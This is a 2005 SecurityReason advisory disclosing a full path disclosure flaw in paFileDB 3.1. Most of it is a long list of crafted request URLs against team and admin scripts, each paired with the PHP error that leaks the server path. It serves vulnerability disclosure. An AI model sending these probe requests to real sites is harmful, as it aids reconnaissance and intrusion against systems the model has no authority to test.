SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Details : SecurityReason Advisory

Arrow  Topic : Mass Full Path Disclosure in paFileDB
Arrow  SecurityAlert : 7
Arrow  SecurityRisk : Low  Security Risk Low  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : Yes
Arrow  Exploit Given : Yes
Arrow  Credit : sp3x
Arrow  Date : 07.09.2005

Arrow  Affected Software : paFileDB x=>3.1

FREEWARE Network Scanner Security Events Montoring
Detect network vulnerabilities. Freeware dld! Monitor event logs for security. Dld 30-day eval!

Arrow  Advisory Text :  

-=[ Mass Full Path Disclosure in paFileDB ]=-

Author: sp3x
Date: 12 March 2005

Affected software :
===================
paFileDB version : =>3.1

Description :
=============

paFileDB is designed to allow webmasters have a database of files for
download on their site.
To add a download, all you do is upload the file using FTP or whatever
method you use, log
into paFileDB's admin center, and fill out a form to add a file. paFileDB
lets you edit and
delete the files too.
No more messing with a bunch of HTML pages for a file database on your
site!
Using speedy MySQL for storing data, and powerful PHP for processing
everything, paFileDB is
one of the best and easiest ways to manage files!

Full Path Disclosure :
======================

Full path to script must be kept in secret because it can lead to
successful attack on the
website. If the attacker know Full path to script , he can start searching
some more info on
others folders or about the server where the site is and then try to break
in.

Many scripts can be accessed directly and this will provoke standard
php error messages, which leads to full path disclosure.

Examples :
----------

http://[target]/[pafiledb_dir]/includes/team/auth.php?tuser=[something]
http://[target]/[pafiledb_dir]/includes/team/login.php?login=do
http://[target]/[pafiledb_dir]/includes/team/category.php?category=add
http://[target]/[pafiledb_dir]/includes/team/category.php?category=add&add=
do
http://[target]/[pafiledb_dir]/includes/team/category.php?category=edit
http://[target]/[pafiledb_dir]/includes/team/category.php?category=edit&edi
t=do
http://[target]/[pafiledb_dir]/includes/team/category.php?category=edit&edi
t=form
http://[target]/[pafiledb_dir]/includes/team/category.php?category=delete
http://[target]/[pafiledb_dir]/includes/team/category.php?category=order
http://[target]/[pafiledb_dir]/includes/team/file.php?file=add&add=do
http://[target]/[pafiledb_dir]/includes/team/file.php?file=edit
http://[target]/[pafiledb_dir]/includes/team/file.php?file=edit&edit=do
http://[target]/[pafiledb_dir]/includes/team/file.php?file=edit&edit=form
http://[target]/[pafiledb_dir]/includes/team/file.php?file=delete
http://[target]/[pafiledb_dir]/includes/admin/login.php?login=do
http://[target]/[pafiledb_dir]/includes/admin/team.php?admin[admin_status]=
1&teams=edit&edit=form
http://[target]/[pafiledb_dir]/includes/admin/license.php?license=edit&edit
=form
http://[target]/[pafiledb_dir]/includes/admin/custom.php?custom=edit&edit=f
orm
http://[target]/[pafiledb_dir]/includes/admin/auth.php?user=[something]
http://[target]/[pafiledb_dir]/includes/admin/admins.php?admin[admin_status
]=1&admins=edit&edit=form
http://[target]/[pafiledb_dir]/includes/admin/backupdb.php?admin[admin_stat
us]=1 - download file with error :]
http://[target]/[pafiledb_dir]/includes/admin/category.php?category=edit&ed
it=form
http://[target]/[pafiledb_dir]/includes/admin/file.php?file=edit&edit=form

Error message :
---------------
=====================================
Fatal error: Call to a member function on a non-object in /path to
site/pafiledb/includes/team/auth.php on line 18
=====================================

http://[target]/[pafiledb_dir]/includes/admin/main.php
http://[target]/[pafiledb_dir]/includes/admin/restoredb.php
http://[target]/[pafiledb_dir]/includes/admin/settings.php
http://[target]/[pafiledb_dir]/includes/admin/options.php
http://[target]/[pafiledb_dir]/includes/admin/team.php?admin[admin_status]=
1
http://[target]/[pafiledb_dir]/includes/admin/team.php
http://[target]/[pafiledb_dir]/includes/admin/team.php?admin[admin_status]=
1&teams=add
http://[target]/[pafiledb_dir]/includes/admin/team.php?admin[admin_status]=
1&teams=edit&edit=do
http://[target]/[pafiledb_dir]/includes/admin/team.php?admin[admin_status]=
1&teams=delete
http://[target]/[pafiledb_dir]/includes/admin/license.php
http://[target]/[pafiledb_dir]/includes/admin/license.php?license=add
http://[target]/[pafiledb_dir]/includes/admin/license.php?license=edit
http://[target]/[pafiledb_dir]/includes/admin/license.php?license=edit&edit
=do
http://[target]/[pafiledb_dir]/includes/admin/license.php?license=delete
http://[target]/[pafiledb_dir]/includes/admin/custom.php
http://[target]/[pafiledb_dir]/includes/admin/custom.php?custom=add
http://[target]/[pafiledb_dir]/includes/admin/custom.php?custom=edit
http://[target]/[pafiledb_dir]/includes/admin/custom.php?custom=add&edit=do
http://[target]/[pafiledb_dir]/includes/admin/custom.php?custom=delete
http://[target]/[pafiledb_dir]/includes/admin/admins.php
http://[target]/[pafiledb_dir]/includes/admin/admins.php?admin[admin_status
]=1
http://[target]/[pafiledb_dir]/includes/admin/admins.php?admin[admin_status
]=1&admins=add
http://[target]/[pafiledb_dir]/includes/admin/admins.php?admin[admin_status
]=1&admins=edit
http://[target]/[pafiledb_dir]/includes/admin/admins.php?admin[admin_status
]=1&admins=edit&edit=do
http://[target]/[pafiledb_dir]/includes/admin/admins.php?admin[admin_status
]=1&admins=delete
http://[target]/[pafiledb_dir]/includes/admin/category.php
http://[target]/[pafiledb_dir]/includes/admin/category.php?category=add
http://[target]/[pafiledb_dir]/includes/admin/category.php?category=edit
http://[target]/[pafiledb_dir]/includes/admin/category.php?category=edit&ed
it=do
http://[target]/[pafiledb_dir]/includes/admin/category.php?category=delete
http://[target]/[pafiledb_dir]/includes/admin/category.php?category=order
http://[target]/[pafiledb_dir]/includes/admin/file.php
http://[target]/[pafiledb_dir]/includes/admin/file.php?file=add
http://[target]/[pafiledb_dir]/includes/admin/file.php?file=edit
http://[target]/[pafiledb_dir]/includes/admin/file.php?file=edit&edit=do
http://[target]/[pafiledb_dir]/includes/admin/file.php?file=delete
http://[target]/[pafiledb_dir]/includes/admin/file.php?file=delete&delete=d
o



Error message :
---------------
=====================================
Fatal error: Call to undefined function: adlocbar() in /path to
site/pafiledb/includes/admin/main.php on line 12
=====================================


http://[target]/[pafiledb_dir]/includes/team/category.php?category=delete&d
elete=do&select=[something]
http://[target]/[pafiledb_dir]/includes/team/category.php?category=order&or
der=do
http://[target]/[pafiledb_dir]/includes/team/file.php?file=delete&delete=do
&select=

Error message :
---------------
=====================================
Warning: Invalid argument supplied for foreach() in /path to
site/pafiledb/includes/team/category.php on line 127
=====================================

http://[target]/[pafiledb_dir]/includes/team/file.php?file=upload
http://[target]/[pafiledb_dir]/includes/admin/file.php?file=upload

Error message :
---------------
=====================================
Fatal error: Call to undefined function: doublecheck() in /path to
site/pafiledv/includes/team/file.php on line 32
=====================================

http://[target]/[pafiledb_dir]/includes/team/file.php?file=add

Error message :
---------------
=====================================
Warning: opendir(./images/posticons): failed to open dir: No such file or
directory in /path to site/pafiledb/includes/team/file.php on line 106

Warning: readdir(): supplied argument is not a valid Directory resource in
/path to site/pafiledb/includes/team/file.php on line 107

Fatal error: Call to a member function on a non-object in /path to
site/pafiledb/includes/team/file.php on line 117
======================================

How to fix :
============

Download the new version of the script or update.

Vendor :
========

No respond


Greetz :
========

Special greetz : cXIb8O3 , pkw :)

Contact :
=========

sp3x[at]securityreason[dot].com
www.securityreason.com

Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.